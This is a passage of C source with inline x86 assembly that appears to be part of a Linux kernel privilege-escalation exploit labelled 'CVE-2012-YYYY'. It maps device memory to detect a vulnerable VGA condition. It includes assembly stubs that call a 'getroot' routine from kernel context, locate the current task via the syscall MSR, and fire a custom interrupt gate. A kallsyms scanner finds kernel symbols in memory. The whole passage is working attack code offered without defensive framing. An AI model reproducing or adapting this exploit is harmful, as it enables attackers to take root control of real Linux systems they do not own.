// I HAD TO LEARN VGA FOR THIS
m = cve_2012_YYYY = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, res + 0x619000);
if (m != MAP_FAILED) {
if ((m[0xf00/4] & 8) &&
(m = mmap(NULL, 0x10000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, res + 0xa0000)) != MAP_FAILED) {
printf("[*] CVE-2012-YYYY\n");
mode_x(cve_2012_YYYY); // put into vga mode x, ish
return m;
}
munmap((void*)cve_2012_YYYY, 0x1000);
m = cve_2012_YYYY = MAP_FAILED;
}
return m;
}
static int tasknamelen;
static char taskname[64];
extern long gettask(void);
extern long testgetroot(void);
__used __kernel extern long callsetroot(long uid, long gid);
#define FN(x) ".globl " x "\n\t.type " x ",@function\n\t" x ":\n\t.cfi_startproc\n\t"
#define END ".cfi_endproc\n\t"
asm(
".text\n\t.align 4\n\t"
FN("testgetroot")
// AND HAVE FUN! :D
#ifdef __x86_64__
"swapgs\n\t"
"call getroot\n\t"
"swapgs\n\t"
"iretq\n\t"
#else
"mov %fs, %edi\n\t"
"mov $0xd8, %esi\n\t"
"mov %esi, %fs\n\t"
"call getroot\n\t"
"mov %edi, %fs\n\t"
"iretl\n\t"
#endif
END
FN("gettask")
#ifdef __x86_64__
// Grab some offsets from system_call
"mov $0xc0000082, %ecx\n\t"
"rdmsr\n\t"
"movslq %eax, %rax\n\t"
// Fuck optional alignment, fix it by looking for
// the start prefix of our lovely mov %gs:.. in system_call we just found
// this will get us kernel_stack, in which most cases it means that
// our current_task is right below it
// This is only needed if kallsyms fails
"1:\n\t"
"cmpw $0x4865, 0x3(%rax)\n\t"
"je 2f\n\t"
"incq %rax\n\t"
"jmp 1b\n\t"
"2:\n\t"
"movl 17(%rax), %edx\n\t"
// blegh padding
"3:\n\t"
"addl $8, %edx\n\t"
"movq %gs:(%edx), %rax\n\t"
"test %eax, %eax\n\t"
"jz 3b\n\t"
"cmpl $-1, %eax\n\t"
"je 3b\n\t"
#else
// TODO: maybe..
"xor %eax, %eax\n\t"
#endif
"ret\n\t"
END
#define S2(x) #x
#define S1(x) S2(x)
FN("callsetroot")
#ifdef __x86_64__
"int $" S1(ENTRY) "\n\t"
#else
"push %edi\n\t"
"push %esi\n\t"
"int $" S1(ENTRY) "\n\t"
"pop %esi\n\t"
"pop %edi\n\t"
#endif
"ret\n\t"
END
".previous");
struct kallsyms {
unsigned long *addresses;
unsigned long num_syms;
unsigned char *names;
unsigned long *markers;
unsigned char *token_table;
unsigned short *token_index;
};
// Memory layout kallsyms, all pointer aligned:
// unsigned long addresses[num_kallsyms]
// unsigned long num_kallsyms
// unsigned char names[..]
// unsigned long markers[(num_kallsyms + 0xff) >> 8] = { 0, ... }
// char token_table[var...] = { null terminated strings }
// unsigned short token_index[var?...] = { 0, ... };
// This should probably work for 64-bits and 32-bits kernels
// But only tested on 64-bits kernels
inline static long init_kallsyms(struct kallsyms *ks)
{
unsigned long start = KERNEL_BASE + 0x1000000L;
unsigned long *max = (void*)KERNEL_BASE + 0x2000000L;
unsigned long *cur;
for (cur = (void*)start; cur < max; cur += 2) {
if (*cur == start &&
(cur[1] == start || cur[-1] == start))
goto unwind;
}
return -1;
unwind:
while ((cur[0] & KERNEL_BASE) == KERNEL_BASE)
cur++;
ks->addresses = cur - *cur;
ks->num_syms = *(cur++);
ks->names = (unsigned char*)cur;
do { cur++; } while (*cur);
ks->markers = cur;
cur += (ks->num_syms + 0xff) >> 8;
ks->token_table = (unsigned char*)cur;
// Zero terminated string can create padding that could
// be interpreted as token_index, requiring the || !*cur
do { cur++; } while (*(unsigned short*)cur || !*cur);
ks->token_index = (unsigned short*)cur;
return (long)ks->num_syms;
}